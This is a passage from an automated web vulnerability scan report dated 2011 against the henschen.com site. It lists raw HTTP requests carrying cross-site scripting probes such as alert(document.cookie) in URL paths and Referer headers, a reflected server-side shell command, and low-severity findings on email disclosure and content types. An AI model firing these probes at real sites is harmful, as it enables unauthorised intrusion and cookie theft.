</gif/ar-oki.gif";REFERER="http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/2v4Rt8ySiyCe3549Z7hDqRBLAAanLMH3.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

Request 2

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:31 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616665
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6434

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-oki.gif";REFERER="";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/o4FQ7QrXaDFV78h1dhjYYm1877Zrd6xc.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

2.8. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif

Request 1

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:30 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616664
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6532

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-sco.gif";REFERER="http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/N4L8Xu5DVwD3vfLO0T2215uc4hsqptL4.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

Request 2

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:37 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616671
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6434

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-sco.gif";REFERER="";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/OU9Uon4cWkfXT1Xtc40Xs8tcgxz83k63.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

3. Email addresses disclosed previous next
There are 11 instances of this issue:

/
/Employee/
/index.php
/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif
/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif
/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif
/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif
/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif
/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif
/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif
/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

3.1. http://henschen.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://henschen.com
Path:	/

Issue detail

The following email address was disclosed in the response:

courts@henschen.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:37:51 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616445
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6379

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
<a href="mailto:courts@henschen.com">
...[SNIP]...
<a href="mailto:courts@henschen.com">courts@henschen.com</a>
...[SNIP]...

3.2. http://henschen.com/Employee/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://henschen.com
Path:	/Employee/

Issue detail

The following email address was disclosed in the response:

courts@henschen.com

Request

GET /Employee/ HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 401 Authorization Required
Date: Tue, 26 Apr 2011 17:38:09 GMT
Server: Apache/1.3.26
WWW-Authenticate: Basic realm="Henschen & Associates, Inc. Employee Area"
Content-Type: text/html
Content-Length: 5211

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title></title>
<link rel="stylesheet" href="/Styles/main.css">
<script src="/Scripts/cservice.
...[SNIP]...
<a href="mailto:courts@henschen.com">
...[SNIP]...
<a href="mailto:courts@henschen.com" onMouseOver="window.status='Henschen & Associates, Inc., E-Mail';return true" onMouseOut="window.status='Henschen & Associates, Inc.';return true">
...[SNIP]...

3.3. http://henschen.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php

Issue detail

The following email address was disclosed in the response:

courts@henschen.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:39:46 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616560
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6379

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
<a href="mailto:courts@henschen.com">
...[SNIP]...
<a href="mailto:courts@henschen.com">courts@henschen.com</a>
...[SNIP]...

3.4. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif

Issue detail

The following email address was disclosed in the response:

courts@henschen.com

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3.5. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif

Issue detail

The following email address was disclosed in the response:

courts@henschen.com

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3.6. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif

Issue detail

The following email address was disclosed in the response:

courts@henschen.com

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3.7. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif

Issue detail

The following email address was disclosed in the response:

courts@henschen.com

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3.8. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif

Issue detail

The following email address was disclosed in the response:

courts@henschen.com

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3.9. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif

Issue detail

The following email address was disclosed in the response:

courts@henschen.com

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3.10. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif

Issue detail

The following email address was disclosed in the response:

courts@henschen.com

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3.11. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif

Issue detail

The following email address was disclosed in the response:

courts@henschen.com

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

4. HTML does not specify charset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://henschen.com
Path:	/Employee/

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

Response

5. Content type incorrectly stated previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://henschen.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:37:59 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-184557173
Expires: Mon, 20 Jun 2005 15:45:06 GMT
Last-Modified: Mon, 20 Jun 2005 15:40:06 GMT
ETag: "d059-57e-42b6e356"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ...........@........................................cc......pp.. ..........<<..gg......66......uu......EE..................OO...........................................
...[SNIP]...

Report generated by XSS.CX at Tue Apr 26 12:46:30 CDT 2011.